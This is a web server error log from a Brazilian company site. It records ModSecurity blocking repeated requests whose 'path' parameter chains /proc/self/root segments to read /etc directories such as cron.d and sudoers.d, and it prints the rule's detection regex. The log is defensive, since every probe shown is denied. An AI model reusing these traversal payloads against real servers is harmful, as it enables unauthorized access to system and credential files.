[Wed Mar 18 08:37:09.214715 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:48614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOZfu8EFLIOrSqIpvukAAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:10.493043 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:55002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOZuw_le52K8_3pV3KEgAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:12.731230 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:55004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOZ-oXxyEfFpUF8f9YUQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:13.405761 2026] [mime_magic:error] [pid 15051:tid 140411708356352] (70014)End of file found: [client 57.141.18.98:55958] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:37:14.317619 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:55018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOavu8EFLIOrSqIpvukgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:15.643387 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:55024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOa0zinOy1jxa1j4f8zwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:15.799301 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:55024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOa0zinOy1jxa1j4f80AAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:17.536641 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:55032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqObUzinOy1jxa1j4f81QAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:18.848126 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:55036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqObtY0UrI5A3LftIyKIgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:20.135468 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:53608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOcNY0UrI5A3LftIyKKAAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:24.736193 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:53614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOdAkwaGbbGflqUZD6awAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:26.047391 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:53630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOdvu8EFLIOrSqIpvungAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:27.386531 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:53640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOd_u8EFLIOrSqIpvuoQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:29.430855 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:53654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOeNY0UrI5A3LftIyKOQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:31.003207 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:50476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOe9Y0UrI5A3LftIyKRQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:32.329217 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:50486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOfAkwaGbbGflqUZD6dAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:33.327926 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:41244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOfQkwaGbbGflqUZD6dgAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:33.614415 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:50488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOfdY0UrI5A3LftIyKSgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:34.992723 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:50492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOftY0UrI5A3LftIyKUAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:36.314277 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:50500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOgNa6ubjKNq_cu4aB_AAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:38.096356 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:40126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOgtY0UrI5A3LftIyKVwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:44.517944 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:50514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOiNa6ubjKNq_cu4aCBwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:37:45.811776 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:40278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOicdf6f5d65gmYZS9sQAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
